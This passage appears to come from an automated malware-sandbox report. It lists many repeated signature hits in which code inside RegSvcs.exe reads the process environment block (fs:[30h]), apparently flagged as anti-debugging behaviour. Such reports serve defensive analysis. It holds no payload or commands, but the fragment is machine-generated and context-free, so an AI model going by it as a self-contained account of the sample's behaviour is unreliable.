            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013EA3C0 mov eax, dword ptr fs:[00000030h]  15_2_013EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013EA3C0 mov eax, dword ptr fs:[00000030h]  15_2_013EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013EA3C0 mov eax, dword ptr fs:[00000030h]  15_2_013EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E83C0 mov eax, dword ptr fs:[00000030h]  15_2_013E83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E83C0 mov eax, dword ptr fs:[00000030h]  15_2_013E83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E83C0 mov eax, dword ptr fs:[00000030h]  15_2_013E83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E83C0 mov eax, dword ptr fs:[00000030h]  15_2_013E83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01468243 mov eax, dword ptr fs:[00000030h]  15_2_01468243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01468243 mov ecx, dword ptr fs:[00000030h]  15_2_01468243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013D823B mov eax, dword ptr fs:[00000030h]  15_2_013D823B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014B625D mov eax, dword ptr fs:[00000030h]  15_2_014B625D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0149A250 mov eax, dword ptr fs:[00000030h]  15_2_0149A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0149A250 mov eax, dword ptr fs:[00000030h]  15_2_0149A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]  15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]  15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]  15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]  15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]  15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]  15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]  15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]  15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]  15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]  15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]  15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]  15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013D826B mov eax, dword ptr fs:[00000030h]  15_2_013D826B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E4260 mov eax, dword ptr fs:[00000030h]  15_2_013E4260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E4260 mov eax, dword ptr fs:[00000030h]  15_2_013E4260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E4260 mov eax, dword ptr fs:[00000030h]  15_2_013E4260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E6259 mov eax, dword ptr fs:[00000030h]  15_2_013E6259
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013DA250 mov eax, dword ptr fs:[00000030h]  15_2_013DA250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014B62D6 mov eax, dword ptr fs:[00000030h]  15_2_014B62D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01460283 mov eax, dword ptr fs:[00000030h]  15_2_01460283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01460283 mov eax, dword ptr fs:[00000030h]  15_2_01460283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01460283 mov eax, dword ptr fs:[00000030h]  15_2_01460283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141E284 mov eax, dword ptr fs:[00000030h]  15_2_0141E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141E284 mov eax, dword ptr fs:[00000030h]  15_2_0141E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F02E1 mov eax, dword ptr fs:[00000030h]  15_2_013F02E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F02E1 mov eax, dword ptr fs:[00000030h]  15_2_013F02E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F02E1 mov eax, dword ptr fs:[00000030h]  15_2_013F02E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014762A0 mov eax, dword ptr fs:[00000030h]  15_2_014762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014762A0 mov ecx, dword ptr fs:[00000030h]  15_2_014762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014762A0 mov eax, dword ptr fs:[00000030h]  15_2_014762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014762A0 mov eax, dword ptr fs:[00000030h]  15_2_014762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014762A0 mov eax, dword ptr fs:[00000030h]  15_2_014762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014762A0 mov eax, dword ptr fs:[00000030h]  15_2_014762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013EA2C3 mov eax, dword ptr fs:[00000030h]  15_2_013EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013EA2C3 mov eax, dword ptr fs:[00000030h]  15_2_013EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013EA2C3 mov eax, dword ptr fs:[00000030h]  15_2_013EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013EA2C3 mov eax, dword ptr fs:[00000030h]  15_2_013EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013EA2C3 mov eax, dword ptr fs:[00000030h]  15_2_013EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0535 mov eax, dword ptr fs:[00000030h]  15_2_013F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0535 mov eax, dword ptr fs:[00000030h]  15_2_013F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0535 mov eax, dword ptr fs:[00000030h]  15_2_013F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0535 mov eax, dword ptr fs:[00000030h]  15_2_013F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0535 mov eax, dword ptr fs:[00000030h]  15_2_013F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0535 mov eax, dword ptr fs:[00000030h]  15_2_013F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141656A mov eax, dword ptr fs:[00000030h]  15_2_0141656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141656A mov eax, dword ptr fs:[00000030h]  15_2_0141656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141656A mov eax, dword ptr fs:[00000030h]  15_2_0141656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01476500 mov eax, dword ptr fs:[00000030h]  15_2_01476500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014B4500 mov eax, dword ptr fs:[00000030h]  15_2_014B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014B4500 mov eax, dword ptr fs:[00000030h]  15_2_014B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014B4500 mov eax, dword ptr fs:[00000030h]  15_2_014B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014B4500 mov eax, dword ptr fs:[00000030h]  15_2_014B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014B4500 mov eax, dword ptr fs:[00000030h]  15_2_014B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014B4500 mov eax, dword ptr fs:[00000030h]  15_2_014B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014B4500 mov eax, dword ptr fs:[00000030h]  15_2_014B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E8550 mov eax, dword ptr fs:[00000030h]  15_2_013E8550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E8550 mov eax, dword ptr fs:[00000030h]  15_2_013E8550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140E53E mov eax, dword ptr fs:[00000030h]  15_2_0140E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140E53E mov eax, dword ptr fs:[00000030h]  15_2_0140E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140E53E mov eax, dword ptr fs:[00000030h]  15_2_0140E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140E53E mov eax, dword ptr fs:[00000030h]  15_2_0140E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140E53E mov eax, dword ptr fs:[00000030h]  15_2_0140E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141E5CF mov eax, dword ptr fs:[00000030h]  15_2_0141E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141E5CF mov eax, dword ptr fs:[00000030h]  15_2_0141E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141A5D0 mov eax, dword ptr fs:[00000030h]  15_2_0141A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141A5D0 mov eax, dword ptr fs:[00000030h]  15_2_0141A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]  15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]  15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]  15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]  15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]  15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]  15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]  15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]  15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141C5ED mov eax, dword ptr fs:[00000030h]  15_2_0141C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141C5ED mov eax, dword ptr fs:[00000030h]  15_2_0141C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E2582 mov eax, dword ptr fs:[00000030h]  15_2_013E2582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E2582 mov ecx, dword ptr fs:[00000030h]  15_2_013E2582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01414588 mov eax, dword ptr fs:[00000030h]  15_2_01414588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141E59C mov eax, dword ptr fs:[00000030h]  15_2_0141E59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E25E0 mov eax, dword ptr fs:[00000030h]  15_2_013E25E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014605A7 mov eax, dword ptr fs:[00000030h]  15_2_014605A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014605A7 mov eax, dword ptr fs:[00000030h]  15_2_014605A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014605A7 mov eax, dword ptr fs:[00000030h]  15_2_014605A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E65D0 mov eax, dword ptr fs:[00000030h]  15_2_013E65D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014045B1 mov eax, dword ptr fs:[00000030h]  15_2_014045B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014045B1 mov eax, dword ptr fs:[00000030h]  15_2_014045B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]  15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]  15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]  15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]  15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]  15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]  15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]  15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]  15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140245A mov eax, dword ptr fs:[00000030h]  15_2_0140245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013DC427 mov eax, dword ptr fs:[00000030h]  15_2_013DC427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013DE420 mov eax, dword ptr fs:[00000030h]  15_2_013DE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013DE420 mov eax, dword ptr fs:[00000030h]  15_2_013DE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013DE420 mov eax, dword ptr fs:[00000030h]  15_2_013DE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0149A456 mov eax, dword ptr fs:[00000030h]  15_2_0149A456
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0146C460 mov ecx, dword ptr fs:[00000030h]  15_2_0146C460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140A470 mov eax, dword ptr fs:[00000030h]  15_2_0140A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140A470 mov eax, dword ptr fs:[00000030h]  15_2_0140A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0140A470 mov eax, dword ptr fs:[00000030h]  15_2_0140A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01418402 mov eax, dword ptr fs:[00000030h]  15_2_01418402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01418402 mov eax, dword ptr fs:[00000030h]  15_2_01418402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01418402 mov eax, dword ptr fs:[00000030h]  15_2_01418402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013D645D mov eax, dword ptr fs:[00000030h]  15_2_013D645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01466420 mov eax, dword ptr fs:[00000030h]  15_2_01466420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01466420 mov eax, dword ptr fs:[00000030h]  15_2_01466420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01466420 mov eax, dword ptr fs:[00000030h]  15_2_01466420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01466420 mov eax, dword ptr fs:[00000030h]  15_2_01466420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01466420 mov eax, dword ptr fs:[00000030h]  15_2_01466420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01466420 mov eax, dword ptr fs:[00000030h]  15_2_01466420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01466420 mov eax, dword ptr fs:[00000030h]  15_2_01466420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141A430 mov eax, dword ptr fs:[00000030h]  15_2_0141A430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E64AB mov eax, dword ptr fs:[00000030h]  15_2_013E64AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0149A49A mov eax, dword ptr fs:[00000030h]  15_2_0149A49A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E04E5 mov ecx, dword ptr fs:[00000030h]  15_2_013E04E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014144B0 mov ecx, dword ptr fs:[00000030h]  15_2_014144B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0146A4B0 mov eax, dword ptr fs:[00000030h]  15_2_0146A4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141674D mov esi, dword ptr fs:[00000030h]  15_2_0141674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141674D mov eax, dword ptr fs:[00000030h]  15_2_0141674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141674D mov eax, dword ptr fs:[00000030h]  15_2_0141674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01422750 mov eax, dword ptr fs:[00000030h]  15_2_01422750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01422750 mov eax, dword ptr fs:[00000030h]  15_2_01422750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01464755 mov eax, dword ptr fs:[00000030h]  15_2_01464755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0146E75D mov eax, dword ptr fs:[00000030h]  15_2_0146E75D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E0710 mov eax, dword ptr fs:[00000030h]  15_2_013E0710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141C700 mov eax, dword ptr fs:[00000030h]  15_2_0141C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E8770 mov eax, dword ptr fs:[00000030h]  15_2_013E8770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]  15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]  15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]  15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]  15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]  15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]  15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]  15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]  15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]  15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]  15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]  15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]  15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01410710 mov eax, dword ptr fs:[00000030h]  15_2_01410710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141C720 mov eax, dword ptr fs:[00000030h]  15_2_0141C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141C720 mov eax, dword ptr fs:[00000030h]  15_2_0141C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E0750 mov eax, dword ptr fs:[00000030h]  15_2_013E0750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0145C730 mov eax, dword ptr fs:[00000030h]  15_2_0145C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141273C mov eax, dword ptr fs:[00000030h]  15_2_0141273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141273C mov ecx, dword ptr fs:[00000030h]  15_2_0141273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141273C mov eax, dword ptr fs:[00000030h]  15_2_0141273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014607C3 mov eax, dword ptr fs:[00000030h]  15_2_014607C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E07AF mov eax, dword ptr fs:[00000030h]  15_2_013E07AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0146E7E1 mov eax, dword ptr fs:[00000030h]  15_2_0146E7E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014027ED mov eax, dword ptr fs:[00000030h]  15_2_014027ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014027ED mov eax, dword ptr fs:[00000030h]  15_2_014027ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014027ED mov eax, dword ptr fs:[00000030h]  15_2_014027ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E47FB mov eax, dword ptr fs:[00000030h]  15_2_013E47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E47FB mov eax, dword ptr fs:[00000030h]  15_2_013E47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0148678E mov eax, dword ptr fs:[00000030h]  15_2_0148678E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014947A0 mov eax, dword ptr fs:[00000030h]  15_2_014947A0
